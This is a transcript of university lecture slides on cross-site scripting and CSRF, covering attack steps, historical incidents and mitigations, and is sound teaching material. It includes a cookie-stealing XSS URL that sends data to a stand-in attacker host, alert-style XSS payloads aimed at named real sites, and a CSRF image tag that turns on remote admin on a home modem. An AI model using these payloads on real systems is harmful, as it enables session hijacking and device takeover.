Cross-Site Attacks
description
Transcript of Cross-Site Attacks
![Page 1: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/1.jpg)
Cross-Site Attacks
James WaldenNorthern Kentucky University
![Page 2: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/2.jpg)
CSC 666: Secure Software Engineering
Cross-Site Attacks
Target users of application. Use application feature to reach other users
of application. Clients are less well defended than servers. Obtain assets of individual users rather than
assets of entire application.
Most common type of attack. Cross-Site Scripting (XSS) Cross-Site Request Forgery (CSRF)
![Page 3: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/3.jpg)
CSC 666: Secure Software Engineering
Cross-Site Scripting (XSS)
Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing.
Impact of XSS Account hijacking. Browser hijacking (malware hosting.) Information leakage (stored form values, etc.) Virtual defacement.
![Page 4: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/4.jpg)
CSC 666: Secure Software Engineering
XSS ExamplesMySpace worm (October 2005)
When someone viewed Samy’s profile:- Set him as friend of viewer.- Incorporated code in viewer’s profile.
Paypal (2006) XSS redirect used to steal money from Paypal
users in a phishing scam.BBC, CBS (2006)
By following XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department.
![Page 5: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/5.jpg)
CSC 666: Secure Software Engineering
XSS Key Steps
1. Attacker sends code to web application.2. Legitimate user accesses web app.3. Web app sends attacker code to user.4. User’s browser executes code.
![Page 6: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/6.jpg)
CSC 666: Secure Software Engineering
XSS Example
Client browser sends an error message to the web server.
https://example.com/error.php?message=Sorry%2C+an +error+occurred
![Page 7: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/7.jpg)
CSC 666: Secure Software Engineering
XSS Example
The error message is “Reflected” back from the Web server to the client in a web page.
![Page 8: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/8.jpg)
CSC 666: Secure Software Engineering
XSS Example
We can replace the error with JavaScript
https://example.com/error.php?message=<script>alert(‘xss’);</script>
![Page 9: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/9.jpg)
CSC 666: Secure Software Engineering
Exploiting the Example
1. User logins in and is issued a cookie2. Attacker feed the URL to user
https://example.com/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;</script>
![Page 10: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/10.jpg)
CSC 666: Secure Software Engineering
Why does XSS Work?Same-Origin Policy
Browser only allows Javascript from site X to access cookies and other data from site X.
Attacker needs to make attack come from site X.
Vulnerable Server Program Any program that returns user input without
filtering out dangerous code.
![Page 11: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/11.jpg)
CSC 666: Secure Software Engineering
Reflected XSS Attack Scenario
User clicks on link. Injected script returned by one-time message
from vulnerable site. User browser executes injected code.
Limitations Non-persistent. Only works when user clicks. Most common type of XSS (~75%).
![Page 12: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/12.jpg)
CSC 666: Secure Software Engineering
Anatomy of an XSS Attack
1. Login
2. Cookie
Web Server
3. XSS Attack
AttackerUser
4. User clicks on XSS link.
5. XSS URL
7. Browser runs injected code.
Evil site saves ID.
8. Attacker hijacks user session.
6. Page with injected code.
![Page 13: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/13.jpg)
CSC 666: Secure Software Engineering
XSS URL Exampleshttp://www.microsoft.com/education/?
ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>
http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
![Page 14: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/14.jpg)
CSC 666: Secure Software Engineering
Stored XSS Injected script stored in
Post or comment. Review. Uploaded file.
User views page with injected script. Malicious action is taken while user is logged
into site where malware found. Not technically cross-site.
Attack persists until injected code deleted.
![Page 15: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/15.jpg)
CSC 666: Secure Software Engineering
DOM-based XSS
Attack scenario User clicks on URL with crafted Javascript. Application’s client code extracts data from
URL and dynamically updates page with it. User browser executes crafted Javascript that
was inserted in the page.
Exploits vulnerability in client code. Server does not reflect or store evil Javascript.
![Page 16: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/16.jpg)
CSC 666: Secure Software Engineering
Mitigating XSS1. Disallow HTML input2. Allow only safe HTML tags3. Filter output
Replace HTML special characters in outputex: replace < with < and > with >also replace (, ), #, &
4. Tagged cookiesInclude IP address in cookie and only allow access to original IP address that cookie was created for.
![Page 17: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/17.jpg)
CSC 666: Secure Software Engineering
Cross-Site Request Forgery
A confused deputy attack. Exploits trust that application has with
authentication sessions.Attack scenario:
User authenticates to web application. User browses to another site containing a
malicious CSRF attack link to web app.- iframe, img, link, bgsound, etc.
Browser accesses web app with cached credentials, performing whatever action specified by the link.
![Page 18: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/18.jpg)
CSC 666: Secure Software Engineering
Why is the Application Fooled?
Browser sends same GET request if User submits form. Browser fetches iframe or img src, etc.
Browser sends cookies with any GET request to appropriate domain + path. Same origin policy applies to frames, XHRs,
but not to HTML tags.
![Page 19: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/19.jpg)
CSC 666: Secure Software Engineering
Example: DSL Modem Attack Home network devs
administered via web apps. Standard local IPs.
Attacker inserts 1-pixel img tag on page. src is URL of form
submission, giving remote admin.
No password needed. Software owner assumed
device on trusted local network.
Of course, browser is on the local network too.
<img src="http://192.168.1.254/Forms/remoteRES_1?NSS_RemotePassword=blehblah&NSS_EnableWANAdminAccessRES=on&timeoutDisable=0&Enable=Enable" alt="" width="1" height="1" />
![Page 20: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/20.jpg)
CSC 666: Secure Software Engineering
Mitigating CSRF
Require POST for data modifications, but Many frameworks automatically fetch both types of
parameters or convert one to other. Hidden POST requests can be created with scripts.
Check referer header. But users can block or forge referer header, so it
cannot be relied on for everyone.
Use nonces. Random token inserted as hidden parameter, and thus
submitted with form. But XSS can read form, so a combined XSS + CSRF
attack can bypass this defense.
![Page 21: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/21.jpg)
CSC 666: Secure Software Engineering
Mitigating CSRF
Re-authenticate for high value transactions. Use out of band authentication if possible.
Expire session IDs quickly. But there will always be some time period in
which a CSRF attack will work.
Automate defenses with tools. CSRFGuard to insert nonces. CSRFTester to verify application.
![Page 22: Cross-Site Attacks](https://reader036.fdocuments.in/reader036/viewer/2022070419/56815c76550346895dca8cdb/html5/thumbnails/22.jpg)
CSC 666: Secure Software Engineering
References1. Brian Chess and Jacob West, Secure Programming with
Static Analysis, Addison-Wesley, 2007.2. Seth Fogie et. al., XSS Attacks: Cross-Site Scripting
Exploits and Defense, Syngress, 2007.3. Michael Howard, David LeBlanc, and John Viega, 19
Deadly Sins of Software Security, McGraw-Hill Osborne, 2005.
4. Nathan, http://www.neohaxor.org/2008/12/01/csrf-vulns-on-local-network-devices/, 2008.
5. PCI Security Standards Council, PCI DSS Requirements and Security Assessment Procedures, v1.2, 2008.
6. Dafydd Stuttart and Marcus Pinto, The Web Application Hacker’s Handbook, Wiley, 2008.